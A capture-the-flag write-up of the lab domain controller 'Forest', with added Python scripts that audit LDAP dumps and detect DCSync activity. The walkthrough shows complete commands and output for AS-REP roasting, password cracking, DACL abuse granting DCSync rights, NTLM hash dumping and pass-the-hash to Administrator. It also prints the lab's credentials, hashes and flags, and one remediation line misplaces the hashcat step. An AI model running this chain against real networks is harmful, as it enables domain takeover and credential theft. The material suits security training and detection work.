Proof of Concept
10.129.8.14
Nmap
PORT STATE SERVICE
53/tcp open domain
88/tcp open kerberos-sec
135/tcp open msrpc
139/tcp open netbios-ssn
389/tcp open ldap
445/tcp open microsoft-ds
464/tcp open kpasswd5
593/tcp open http-rpc-epmap
636/tcp open ldapssl
3268/tcp open globalcatLDAP
3269/tcp open globalcatLDAPssl
5985/tcp open wsman
53/udp open domain
88/udp open kerberos-sec
123/udp open ntp
389/udp open ldap
Information Gathering
Collecting host information
┌──(kali㉿kali)-[~/Forest]
└─$ nxc smb 10.129.8.14 --generate-hosts-file hosts
SMB 10.129.8.14 445 FOREST [*] Windows 10 / Server 2016 Build 14393 x64 (name:FOREST) (domain:htb.local) (signing:True) (SMBv1:True)
┌──(kali㉿kali)-[~/Forest]
└─$ cat hosts
10.129.8.14 FOREST.htb.local htb.local FOREST
/etc/hosts file configuration
┌──(kali㉿kali)-[~/Forest]
└─$ cat /etc/hosts
127.0.0.1 localhost
127.0.1.1 kali
::1 localhost ip6-localhost ip6-loopback
ff02::1 ip6-allnodes
ff02::2 ip6-allrouters
10.129.8.14 FOREST.htb.local htb.local FOREST
Initial Access
Null session LDAP information gathering
┌──(kali㉿kali)-[~/Forest]
└─$ ldapsearch -x -H ldap://10.129.8.14 -D '' -w '' -b "DC=htb,DC=local" | tee ldapsearch
# extended LDIF
#
# LDAPv3
# base <DC=htb,DC=local> with scope subtree
# filter: (objectclass=*)
# requesting: ALL
#
# htb.local
dn: DC=htb,DC=local
objectClass: top
objectClass: domain
objectClass: domainDNS
distinguishedName: DC=htb,DC=local
instanceType: 5
whenCreated: 20190918174549.0Z
whenChanged: 20260225170336.0Z
subRefs: DC=ForestDnsZones,DC=htb,DC=local
subRefs: DC=DomainDnsZones,DC=htb,DC=local
subRefs: CN=Configuration,DC=htb,DC=local
<SNIP>
Filter the usernames out of the collected LDAP data to create userlist.txt
┌──(kali㉿kali)-[~/Forest]
└─$ cat ldapsearch | grep 'dn: CN=' | cut -d '=' -f 2 | cut -d ',' -f 1 | uniq > userlist.txt
AS-REP roasting against this list, looking for accounts with Kerberos pre-authentication disabled, showed that the svc-alfresco user has it disabled, and the hash for that user was obtained.
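The AS-REP roasting step only works against accounts whose userAccountControl carries the DONT_REQ_PREAUTH bit, which is exactly what a defender should be auditing for. The script below is an added example for this writeup, not code from the original walkthrough: it parses an ldapsearch-style LDIF dump (handling comment lines and folded continuation lines), reads sAMAccountName directly rather than deriving logon names from the CN, and reports every user object with pre-authentication disabled, distinguishing enabled accounts from disabled ones. SAMPLE_LDIF is constructed data in the shape of the ldapsearch output above, not the box's real directory contents; replace it with the saved ldapsearch file to run it for real.

```python
"""Audit an ldapsearch LDIF dump for accounts that do not require Kerberos
pre-authentication, the condition AS-REP roasting depends on.

Added example for this writeup, not part of the original walkthrough. SAMPLE_LDIF
is constructed data shaped like the ldapsearch output above, not the real
directory contents of the box.
"""

# userAccountControl bits (Microsoft's documented UF_* values)
ACCOUNTDISABLE = 0x0002
DONT_REQ_PREAUTH = 0x400000

# Constructed sample: a normal user, a disabled account with pre-auth off,
# and an enabled service account with pre-auth off (its dn is folded).
SAMPLE_LDIF = """\
# extended LDIF
#
# LDAPv3
dn: CN=Sample User,OU=Employees,DC=example,DC=local
objectClass: top
objectClass: user
sAMAccountName: sample.user
userAccountControl: 512

dn: CN=Old Contractor,OU=Employees,DC=example,DC=local
objectClass: top
objectClass: user
sAMAccountName: old.contractor
userAccountControl: 4194818

dn: CN=svc-demo,OU=Service Accounts,DC=example,
 DC=local
objectClass: top
objectClass: user
sAMAccountName: svc-demo
userAccountControl: 4194816
"""


def parse_ldif(text):
    """Split LDIF text into a list of {attribute: [values]} dicts.

    Handles '#' comment lines, blank-line record separators and folded
    continuation lines (a leading single space continues the previous value).
    Base64 values ('attr:: ...') are kept as the raw encoded string.
    """
    entries, current, last_key = [], {}, None
    for raw in text.splitlines():
        if raw.startswith("#"):
            continue
        if raw.startswith(" ") and last_key is not None:
            current[last_key][-1] += raw[1:]
            continue
        if not raw.strip():
            if current:
                entries.append(current)
            current, last_key = {}, None
            continue
        key, _, value = raw.partition(":")
        key = key.strip()
        current.setdefault(key, []).append(value.lstrip(": ").strip())
        last_key = key
    if current:
        entries.append(current)
    return entries


def find_no_preauth(entries):
    """Return [(sAMAccountName, enabled)] for user objects with DONT_REQ_PREAUTH set.

    Disabled accounts are listed for completeness, but an *enabled* one is the
    finding that matters: the KDC returns an AS-REP (encrypted with the user's
    key) to anyone who asks for it, so the password can be attacked offline.
    """
    findings = []
    for entry in entries:
        if "user" not in entry.get("objectClass", []):
            continue
        uac = int(entry.get("userAccountControl", ["0"])[0])
        if uac & DONT_REQ_PREAUTH:
            name = entry.get("sAMAccountName", ["?"])[0]
            findings.append((name, not uac & ACCOUNTDISABLE))
    return findings


if __name__ == "__main__":
    for name, enabled in find_no_preauth(parse_ldif(SAMPLE_LDIF)):
        state = "ENABLED: re-enable pre-auth or set a long random password" if enabled else "disabled"
        print(f"{name}: pre-authentication not required ({state})")
```

The remediation for an enabled hit is to clear the "Do not require Kerberos preauthentication" option on the account, or, where an application genuinely needs it, to give the account a long random password so the offline attack shown with hashcat above does not succeed.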
┌──(kali㉿kali)-[~/Forest]
└─$ nxc ldap htb.local -u userlist.txt -p '' --asreproast asreproast.hash
LDAP 10.129.8.14 389 FOREST [*] Windows 10 / Server 2016 Build 14393 (name:FOREST) (domain:htb.local)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_CLIENT_REVOKED(Clients credentials have been revoked)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
[-] Kerberos SessionError: KDC_ERR_C_PRINCIPAL_UNKNOWN(Client not found in Kerberos database)
<SNIP>
LDAP 10.129.8.14 389 FOREST $krb5asrep$23$svc-alfresco@HTB.LOCAL:6ae9c9f706865932c879fe5784ff399f$75d1f6040ad0e86bf050f31eeeda64d950e51f35fc755d631cbeabd8cf1216a060858489cb69ea4e9d6b0804f95a2eeeb8ea80857ee7b39b6b3c644824f517fdcf7c4a1aa111ef863352919ae0835d18dedd2cbafc29013ed7ffb9ec16d53e8824163796abb511c1cb21022ce0277c2e77b07654b81564829710125641192d4e24222f2e4a84179e3008a9548ff5a267091936ffba3efbd047b537be3de44d84e78df884bdde1beb930c317166d1df84411b6b4b52a7e4f9990e296bd9e56ca0cff9362090c74444eb599d6b6e3e4eaf878c86eb1dd241ab063f8f32f9045b66ae11072bef4e
<SNIP>
Cracked the svc-alfresco user's hash to obtain the plaintext password
- svc-alfresco:s3rvice
┌──(kali㉿kali)-[~/Forest]
└─$ hashcat asreproast.hash /usr/share/wordlists/rockyou.txt --quiet
Hash-mode was not specified with -m. Attempting to auto-detect hash mode.
The following mode was auto-detected as the only one matching your input hash:
18200 | Kerberos 5, etype 23, AS-REP | Network Protocol
NOTE: Auto-detect is best effort. The correct hash-mode is NOT guaranteed!
Do NOT report auto-detect issues unless you are certain of the hash type.
$krb5asrep$23$svc-alfresco@HTB.LOCAL:6ae9c9f706865932c879fe5784ff399f$75d1f6040ad0e86bf050f31eeeda64d950e51f35fc755d631cbeabd8cf1216a060858489cb69ea4e9d6b0804f95a2eeeb8ea80857ee7b39b6b3c644824f517fdcf7c4a1aa111ef863352919ae0835d18dedd2cbafc29013ed7ffb9ec16d53e8824163796abb511c1cb21022ce0277c2e77b07654b81564829710125641192d4e24222f2e4a84179e3008a9548ff5a267091936ffba3efbd047b537be3de44d84e78df884bdde1beb930c317166d1df84411b6b4b52a7e4f9990e296bd9e56ca0cff9362090c74444eb599d6b6e3e4eaf878c86eb1dd241ab063f8f32f9045b66ae11072bef4e:s3rvice
Connected over WinRM using the recovered svc-alfresco credentials
┌──(kali㉿kali)-[~/Forest]
└─$ evil-winrm -i htb.local -u 'svc-alfresco' -p 's3rvice'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\svc-alfresco\Documents>
Read user.txt
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> cat user.txt
31b21d9b8e600ee94b266ae70f9d243d
*Evil-WinRM* PS C:\Users\svc-alfresco\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::84
IPv6 Address. . . . . . . . . . . : dead:beef::c6e:5b2f:ba39:cb18
Link-local IPv6 Address . . . . . : fe80::c6e:5b2f:ba39:cb18%5
IPv4 Address. . . . . . . . . . . : 10.129.8.14
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%5
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb
Privilege Escalation
BloodHound data collection
┌──(kali㉿kali)-[~/Forest]
└─$ bloodhound-python -d 'htb.local' -u 'svc-alfresco' -p 's3rvice' -c All -ns 10.129.8.14 --zip
INFO: BloodHound.py for BloodHound LEGACY (BloodHound 4.2 and 4.3)
INFO: Found AD domain: htb.local
INFO: Getting TGT for user
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Testing resolved hostname connectivity dead:beef::84
INFO: Trying LDAP connection to dead:beef::84
INFO: Testing resolved hostname connectivity dead:beef::c6e:5b2f:ba39:cb18
INFO: Trying LDAP connection to dead:beef::c6e:5b2f:ba39:cb18
INFO: Found 1 domains
INFO: Found 1 domains in the forest
INFO: Found 2 computers
INFO: Connecting to LDAP server: FOREST.htb.local
INFO: Testing resolved hostname connectivity dead:beef::84
INFO: Trying LDAP connection to dead:beef::84
INFO: Testing resolved hostname connectivity dead:beef::c6e:5b2f:ba39:cb18
INFO: Trying LDAP connection to dead:beef::c6e:5b2f:ba39:cb18
INFO: Found 32 users
INFO: Found 76 groups
INFO: Found 2 gpos
INFO: Found 15 ous
INFO: Found 20 containers
INFO: Found 0 trusts
INFO: Starting computer enumeration with 10 workers
INFO: Querying computer: EXCH01.htb.local
INFO: Querying computer: FOREST.htb.local
WARNING: DCE/RPC connection failed: The NETBIOS connection with the remote host timed out.
INFO: Done in 01M 21S
INFO: Compressing output into 20260226080736_bloodhound.zip
Checked BloodHound
- “svc-alfresco” is a member of the group “ACCOUNT OPERATORS”, which has GenericAll permissions on the group “EXCHANGE WINDOWS PERMISSIONS”
- The group “EXCHANGE WINDOWS PERMISSIONS” has the “WriteDacl” permission, which allows it to modify the DACL (Discretionary Access Control List) of the domain HTB.LOCAL
Added the user to the target group “EXCHANGE WINDOWS PERMISSIONS”. The credentials can be supplied in cleartext or prompted for interactively if omitted from the command line:
*Evil-WinRM* PS C:\> net group "EXCHANGE WINDOWS PERMISSIONS" "svc-alfresco" /add /domain
The command completed successfully.
*Evil-WinRM* PS C:\> net user svc-alfresco /domain
User name svc-alfresco
Full Name svc-alfresco
Comment
User's comment
Country/region code 000 (System Default)
Account active Yes
Account expires Never
Password last set 2/26/2026 5:27:09 AM
Password expires Never
Password changeable 2/27/2026 5:27:09 AM
Password required Yes
User may change password Yes
Workstations allowed All
Logon script
User profile
Home directory
Last logon 2/26/2026 5:07:45 AM
Logon hours allowed All
Local Group Memberships
Global Group memberships *Exchange Windows Perm*Domain Users
*Service Accounts
The command completed successfully.
To abuse WriteDacl on the domain object, svc-alfresco was granted DCSync rights.
┌──(kali㉿kali)-[~/Forest]
└─$ impacket-dacledit -action 'write' -rights 'DCSync' -principal 'svc-alfresco' -target-dn 'DC=htb,DC=local' 'htb.local/svc-alfresco:s3rvice'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[*] DACL backed up to dacledit-20260226-083429.bak
[*] DACL modified successfully!
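Both steps of this escalation leave a trace in the domain controller's Security log: the dacledit run above modifies nTSecurityDescriptor on the domain head (event 5136, when Directory Service Changes auditing and a SACL are in place), and the replication that follows shows up as event 4662 with the DS-Replication-Get-Changes control access rights exercised by an account that is not a domain controller. The script below is an added example for this writeup, not code from the original walkthrough or from Impacket: it runs those two checks over constructed sample events. The event dicts are constructed samples whose keys follow the Security log XML field names (SubjectUserName, ObjectDN, Properties, AccessMask), and DC_ACCOUNTS is an assumption that has to be filled in with the real DC machine accounts of the monitored domain.

```python
"""Detect the two escalation steps shown above from Windows Security events:
a DACL change on the domain naming context (event 5136, attribute
nTSecurityDescriptor) and a DCSync-style replication request from an account
that is not a domain controller (event 4662 carrying a DS-Replication-Get-Changes*
control access right).

Added example for this writeup, not part of the original walkthrough. Events are
constructed dicts whose keys follow the Security log XML (SubjectUserName,
ObjectDN, Properties, AccessMask); DC_ACCOUNTS is an assumption that must be
filled in for the domain being monitored.
"""
import re

# Well-known control access right GUIDs for directory replication
REPL_RIGHTS = {
    "1131f6aa-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes",
    "1131f6ad-9c07-11d1-f79f-00c04fc2dcd2": "DS-Replication-Get-Changes-All",
    "89e95b76-444d-4c62-991a-0facbeda640c": "DS-Replication-Get-Changes-In-Filtered-Set",
}
CONTROL_ACCESS = 0x100  # ADS_RIGHT_DS_CONTROL_ACCESS bit of the 4662 AccessMask
DOMAIN_NC = "DC=htb,DC=local"
DC_ACCOUNTS = {"FOREST$"}  # assumption: machine accounts of the domain's DCs

GUID_RE = re.compile(r"[0-9a-f]{8}-(?:[0-9a-f]{4}-){3}[0-9a-f]{12}", re.I)

# Constructed sample events: normal DC-to-DC replication, the DACL write on the
# domain head, the replication request from the service account, and an
# unrelated 4662 (plain read of a user object) that must not alert.
SAMPLE_EVENTS = [
    {"EventID": 4662, "SubjectUserName": "FOREST$", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 5136, "SubjectUserName": "svc-alfresco", "ObjectDN": "DC=htb,DC=local",
     "AttributeLDAPDisplayName": "nTSecurityDescriptor"},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "AccessMask": "0x100",
     "Properties": "{1131f6aa-9c07-11d1-f79f-00c04fc2dcd2}\n{1131f6ad-9c07-11d1-f79f-00c04fc2dcd2}"},
    {"EventID": 4662, "SubjectUserName": "svc-alfresco", "AccessMask": "0x10",
     "Properties": "{bf967aba-0de6-11d0-a285-00aa003049e2}"},
]


def dcsync_alerts(events, dc_accounts=DC_ACCOUNTS):
    """Return [(user, [right names])] for 4662 events in which a principal that
    is not a domain controller exercised a replication control access right."""
    alerts = []
    for ev in events:
        if ev.get("EventID") != 4662:
            continue
        if not int(ev.get("AccessMask", "0"), 16) & CONTROL_ACCESS:
            continue
        rights = [REPL_RIGHTS[g.lower()] for g in GUID_RE.findall(ev.get("Properties", ""))
                  if g.lower() in REPL_RIGHTS]
        user = ev.get("SubjectUserName", "")
        if rights and user.upper() not in dc_accounts:
            alerts.append((user, rights))
    return alerts


def domain_dacl_alerts(events, domain_nc=DOMAIN_NC):
    """Return the principals that modified nTSecurityDescriptor on the domain head.
    Event 5136 is only produced when 'Audit Directory Service Changes' is enabled
    and the object carries a matching SACL."""
    return [ev["SubjectUserName"] for ev in events
            if ev.get("EventID") == 5136
            and ev.get("ObjectDN", "").lower() == domain_nc.lower()
            and ev.get("AttributeLDAPDisplayName") == "nTSecurityDescriptor"]


if __name__ == "__main__":
    for who in domain_dacl_alerts(SAMPLE_EVENTS):
        print(f"[!] {who} changed the DACL of {DOMAIN_NC}")
    for who, rights in dcsync_alerts(SAMPLE_EVENTS):
        print(f"[!] {who} requested directory replication: {', '.join(rights)}")
```

On a real estate the events would come from the DC's Security log (for example exported as XML or forwarded to a SIEM) rather than from SAMPLE_EVENTS, and the DC allow-list should be generated from the Domain Controllers OU rather than typed in. When either check fires, the response is to remove the added ACE (dacledit wrote a .bak of the previous DACL, as shown above), treat every secret in the domain as exposed, and review who holds membership in Account Operators and Exchange Windows Permissions, since those memberships are what made the path available in the first place.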
Dumped administrator’s NTLM hashes
┌──(kali㉿kali)-[~/Forest]
└─$ impacket-secretsdump 'svc-alfresco':'s3rvice'@'htb.local'
Impacket v0.13.0.dev0 - Copyright Fortra, LLC and its affiliated companies
[-] RemoteOperations failed: DCERPC Runtime Error: code: 0x5 - rpc_s_access_denied
[*] Dumping Domain Credentials (domain\uid:rid:lmhash:nthash)
[*] Using the DRSUAPI method to get NTDS.DIT secrets
htb.local\Administrator:500:aad3b435b51404eeaad3b435b51404ee:32693b11e6aa90eb43d32c72a07ceea6:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:819af826bb148e603acb0f33d17632f8:::
DefaultAccount:503:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\$331000-VK4ADACQNUCA:1123:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_2c8eef0a09b545acb:1124:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_ca8c2ed5bdab4dc9b:1125:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_75a538d3025e4db9a:1126:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_681f53d4942840e18:1127:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1b41c9286325456bb:1128:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_9b69f1b9d2cc45549:1129:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_7c96b981967141ebb:1130:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_c75ee099d0a64c91b:1131:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\SM_1ffab36a2f5f479cb:1132:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
htb.local\HealthMailboxc3d7722:1134:aad3b435b51404eeaad3b435b51404ee:4761b9904a3d88c9c9341ed081b4ec6f:::
htb.local\HealthMailboxfc9daad:1135:aad3b435b51404eeaad3b435b51404ee:5e89fd2c745d7de396a0152f0e130f44:::
htb.local\HealthMailboxc0a90c9:1136:aad3b435b51404eeaad3b435b51404ee:3b4ca7bcda9485fa39616888b9d43f05:::
htb.local\HealthMailbox670628e:1137:aad3b435b51404eeaad3b435b51404ee:e364467872c4b4d1aad555a9e62bc88a:::
htb.local\HealthMailbox968e74d:1138:aad3b435b51404eeaad3b435b51404ee:ca4f125b226a0adb0a4b1b39b7cd63a9:::
htb.local\HealthMailbox6ded678:1139:aad3b435b51404eeaad3b435b51404ee:c5b934f77c3424195ed0adfaae47f555:::
htb.local\HealthMailbox83d6781:1140:aad3b435b51404eeaad3b435b51404ee:9e8b2242038d28f141cc47ef932ccdf5:::
htb.local\HealthMailboxfd87238:1141:aad3b435b51404eeaad3b435b51404ee:f2fa616eae0d0546fc43b768f7c9eeff:::
htb.local\HealthMailboxb01ac64:1142:aad3b435b51404eeaad3b435b51404ee:0d17cfde47abc8cc3c58dc2154657203:::
htb.local\HealthMailbox7108a4e:1143:aad3b435b51404eeaad3b435b51404ee:d7baeec71c5108ff181eb9ba9b60c355:::
[-] DRSR SessionError: code: 0x20f7 - ERROR_DS_DRA_BAD_DN - The distinguished name specified for this replication operation is invalid.
[*] Something went wrong with the DRSUAPI approach. Try again with -use-vss parameter
[*] Cleaning up...
Accessed the WinRM service using the Administrator's NTLM hash
┌──(kali㉿kali)-[~/Forest]
└─$ evil-winrm -i htb.local -u 'administrator' -H '32693b11e6aa90eb43d32c72a07ceea6'
Evil-WinRM shell v3.9
Warning: Remote path completions is disabled due to ruby limitation: undefined method `quoting_detection_proc' for module Reline
Data: For more information, check Evil-WinRM GitHub: https://github.com/Hackplayers/evil-winrm#Remote-path-completion
Info: Establishing connection to remote endpoint
*Evil-WinRM* PS C:\Users\Administrator\Documents>
Read root.txt
*Evil-WinRM* PS C:\Users\Administrator\Desktop> type root.txt
11809c64ea09fcf472ab8b7b205fe6f4
*Evil-WinRM* PS C:\Users\Administrator\Desktop> ipconfig
Windows IP Configuration
Ethernet adapter Ethernet0:
Connection-specific DNS Suffix . : .htb
IPv6 Address. . . . . . . . . . . : dead:beef::84
IPv6 Address. . . . . . . . . . . : dead:beef::c6e:5b2f:ba39:cb18
Link-local IPv6 Address . . . . . : fe80::c6e:5b2f:ba39:cb18%5
IPv4 Address. . . . . . . . . . . : 10.129.8.14
Subnet Mask . . . . . . . . . . . : 255.255.0.0
Default Gateway . . . . . . . . . : fe80::250:56ff:feb0:8cde%5
10.129.0.1
Tunnel adapter isatap..htb:
Media State . . . . . . . . . . . : Media disconnected
Connection-specific DNS Suffix . : .htb